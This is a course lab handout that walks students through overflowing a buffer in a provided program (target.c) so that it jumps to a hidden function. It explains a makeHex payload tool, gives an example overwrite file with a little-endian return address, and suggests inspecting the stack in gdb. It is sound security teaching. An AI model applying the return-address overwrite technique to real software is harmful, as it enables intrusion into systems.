We learned about buffer overflow attacks in class yesterday. See the lecture notes if you don't remember the details. Today in lab, you get to create a buffer overflow attack.
First, download the code in lab10.tar.gz. This will un-tar into the lab10 directory.
In the lab10 directory, there is C code called target.c which compiles into a binary executable called target. The rule of today's lab is that you are not allowed to change the code in target.c. The objective of today's lab is to invoke the target function at the bottom of target.c using a buffer overflow attack.
I have provided a utility command to help you out with your attack called makeHex. This function reads a text file from standard input that defines what it's output file should look like. Each line in the input file should start with either the characters C , which says that the remainder of this input line should be copied as text to the output file, or D , which says that the remainder of this input line contains a decimal number to be inserted in the output file. The specification of the decimal number follows the C conventions. If the number starts with a digit in 1-9, then the number is interpretted as a decimal number. If the number starts out with the prefix 0x, then the number is assumed to be a hexidecimal number.
For example, to create the file we used in yesterday's lecture, you could specify the following:
C THE FIRST EIGHTY... D 0x22222222 D 0x22222222 D 0x11111111 D 0x00401230
In fact, I have included this example in the proj10 directory as a file called xmp.txt. To convert this to the hexadecimal file values used in the lecture, run make xmpHex.txt. To run the octal dump commmand on the resulting file to see it's contents in both character and in decimal, run make showXmp
Notice that I did not have to reverse the bytes of the last address in the xmp.txt file. This is because I'm asking the makeHex command to treat this as a full word. The makeHex command, under the covers, converts the full word value into four characters. In the file itself, the bytes will be reversed... 30 12 40 00 instead of 00401230. The makeHex command allows us to specify a full word as if it's big-endian, but manages that data in a little-endian format under the covers.
If you are curious about how the makeHex commmand works, feel free to take a look at makeHex.c. The code is not terribly difficult, and it shows another example of why you might want to use a union in C code.
Notice that I have provided a Makefile with several useful make targets. These include the following:
Take a look at the Makefile and notice that there are many dependencies. The Makefile is designed so that if you make a target, you will automatically build everything needed for that target before actually running the target.
Your job today is to be able to run make test and get, as the last line of output "Whoopee... you ran the target!" without changing target.c.
In order to accomplish this, you will need to look at target.c, and find out where target.c is vulnerable to a buffer overflow attack. Then you will have to design a buffer overflow attack by writing over the return address with the address in memory of the first instruction in the target function. You will have to look at the X86 code to figure out both what that address is, and where to put that address in your input file. Then you will have to figure out how to modify the test.txt file so that the makeHex binary will produce a testhex.txt file that implements a successful buffer overflow attack.
Don't be surprised if you don't get your buffer overflow attack to work the first time. Use the gdb techniques we learned to examine the contents of the stack after the gets function is complete. The make gdb invocation should get you there quickly. You should be able to see the impact of your file on the stack frame, and check to see if you have put the correct values in the correct places.
Download and edit the following file: lab10_report.txt. Then submit your edited file on Blackboard in the Lab 10 submission area.